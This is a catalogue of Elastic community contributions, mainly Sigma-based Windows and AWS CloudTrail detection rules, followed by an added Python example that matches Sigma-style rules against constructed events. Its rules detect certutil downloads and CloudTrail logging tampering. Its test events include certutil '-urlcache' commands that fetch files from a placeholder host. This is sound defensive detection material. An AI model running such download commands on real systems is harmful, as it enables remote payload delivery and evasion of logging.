Sigma Sysmon detection rules
A collection of rules derived from the Sigma detection rules for Windows Sysmon events, converted to run against Winlogbeat data.
Sigma Windows inbuilt detection rules
A collection of rules derived from the Sigma rules for Windows (inbuilt folder), converted to run against Winlogbeat data.
Sigma Windows Process Creation detection rules
A collection of rules derived from the Sigma rules for Windows (process creation folder), converted to run against Winlogbeat data.
Cloudflare Kibana dashboards
Cloudflare Kibana dashboards and ingest pipelines to visualize Cloudflare logs.
Logstash Pipeline for Talend ESB & MDM
A Logstash pipeline to collect JSON logs from Talend ESB & MDM.
Data flow canvas
This Canvas example shows some possibilities for visualizing data flows. Every flow can be activated or deactivated based on your Elasticsearch data.
Move to next ILM phase Watcher
This Watcher job moves specific indices into the next ILM phase based on a condition such as disk usage.
Logstash REST to exec scripts
Make Logstash a REST endpoint that executes scripts or manually adds data to Elasticsearch. Because such an endpoint turns incoming HTTP requests into script execution, restrict it to trusted clients, for example by binding the Logstash http input to a local or internal address and requiring authentication on it.
Sigma AWS Cloudtrail Detection rules
A collection of rules derived from the Sigma rules for AWS, built on the Filebeat AWS module and the Elastic Agent integration.
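The Sigma-based collections above (the Windows Sysmon and process creation rules on Winlogbeat data, and the AWS CloudTrail rules on Filebeat data) all follow the same pattern: a Sigma rule's field names are mapped to the ECS fields the Beats modules emit, and the rule's selections and condition are evaluated over those events. The following Python matcher is an added example, not code from any of the listed contributions, that shows that pattern end to end over constructed events. The Sigma-to-ECS field mappings, the two rules and the five events are assumptions chosen for illustration; the real converters map many more fields and modifiers.

```python
"""Toy Sigma-rule matcher run over constructed Winlogbeat and Filebeat events.
Added example; rules, events and field mappings below are constructed."""
import re
from typing import Any

# Illustrative Sigma-field -> ECS-field mappings (assumptions for this example).
SYSMON_WINLOGBEAT_MAP = {
    "Image": "process.executable",
    "CommandLine": "process.command_line",
    "ParentImage": "process.parent.executable",
    "EventID": "winlog.event_id",
}
CLOUDTRAIL_FILEBEAT_MAP = {"eventSource": "event.provider", "eventName": "event.action"}


def get_field(event: dict, dotted: str) -> Any:
    """Resolve a dotted ECS path such as process.parent.executable, or None."""
    cur: Any = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def match_value(actual: Any, expected: Any, modifiers: list) -> bool:
    """Apply Sigma value modifiers; non-regex comparisons are case-insensitive."""
    if actual is None:
        return False
    if "re" in modifiers:
        return re.search(str(expected), str(actual)) is not None
    a, e = str(actual).lower(), str(expected).lower()
    if "contains" in modifiers:
        return e in a
    if "startswith" in modifiers:
        return a.startswith(e)
    if "endswith" in modifiers:
        return a.endswith(e)
    return a == e


def match_selection(event: dict, selection: dict, field_map: dict) -> bool:
    """Every key of a selection must match; list values are OR-ed unless |all."""
    for key, expected in selection.items():
        field, *modifiers = key.split("|")
        actual = get_field(event, field_map.get(field, field))
        values = expected if isinstance(expected, list) else [expected]
        combine = all if "all" in modifiers else any
        if not combine(match_value(actual, v, modifiers) for v in values):
            return False
    return True


def evaluate_condition(condition: str, results: dict) -> bool:
    """Evaluate a flat condition such as 'selection and not filter' left to right."""
    result, op, negate = None, None, False
    for tok in condition.split():
        if tok in ("and", "or"):
            op = tok
        elif tok == "not":
            negate = True
        else:
            val = (not results[tok]) if negate else results[tok]
            negate = False
            if result is None:
                result = val
            else:
                result = (result and val) if op == "and" else (result or val)
    return bool(result)


def rule_matches(event: dict, rule: dict, field_map: dict) -> bool:
    det = rule["detection"]
    results = {name: match_selection(event, sel, field_map)
               for name, sel in det.items() if name != "condition"}
    return evaluate_condition(det["condition"], results)


def run_rules(events: list, rules: list) -> list:
    """Return (rule title, event id) pairs for every hit, in input order."""
    return [(rule["title"], event["id"])
            for event in events for rule, field_map in rules
            if rule_matches(event, rule, field_map)]


# Constructed rules in Sigma's detection shape (hypothetical, not from the repo).
CERTUTIL_RULE = {"title": "Certutil download", "detection": {
    "selection": {"Image|endswith": "\\certutil.exe",
                  "CommandLine|contains|all": ["-urlcache", "http"]},
    "filter": {"ParentImage|endswith": "\\msiexec.exe"},
    "condition": "selection and not filter"}}
CLOUDTRAIL_RULE = {"title": "CloudTrail logging tampered", "detection": {
    "selection": {"eventSource": "cloudtrail.amazonaws.com",
                  "eventName": ["StopLogging", "DeleteTrail", "UpdateTrail"]},
    "condition": "selection"}}

# Constructed events in the ECS shape the Beats modules produce.
def _proc(eid, cmd, parent):
    return {"id": eid, "winlog": {"event_id": 1}, "process": {
        "executable": "C:\\Windows\\System32\\certutil.exe", "command_line": cmd,
        "parent": {"executable": "C:\\Windows\\System32\\" + parent}}}

EVENTS = [
    _proc("w1", "certutil.exe -urlcache -split -f http://example.invalid/x x", "cmd.exe"),
    _proc("w2", "certutil.exe -hashfile setup.exe SHA256", "cmd.exe"),
    _proc("w3", "certutil.exe -urlcache -f http://example.invalid/y y", "msiexec.exe"),
    {"id": "a1", "event": {"provider": "cloudtrail.amazonaws.com", "action": "StopLogging"}},
    {"id": "a2", "event": {"provider": "cloudtrail.amazonaws.com", "action": "DescribeTrails"}},
]
RULES = [(CERTUTIL_RULE, SYSMON_WINLOGBEAT_MAP), (CLOUDTRAIL_RULE, CLOUDTRAIL_FILEBEAT_MAP)]

if __name__ == "__main__":
    for title, eid in run_rules(EVENTS, RULES):
        print(f"{eid}: {title}")
```

Running the block reports w1 (certutil download from cmd.exe) and a1 (StopLogging); w2 lacks the download switches, w3 is suppressed by the filter, and a2 is a read-only API call. The matcher deliberately evaluates flat conditions only; real Sigma conditions can nest parentheses and use aggregation, which the production converters handle.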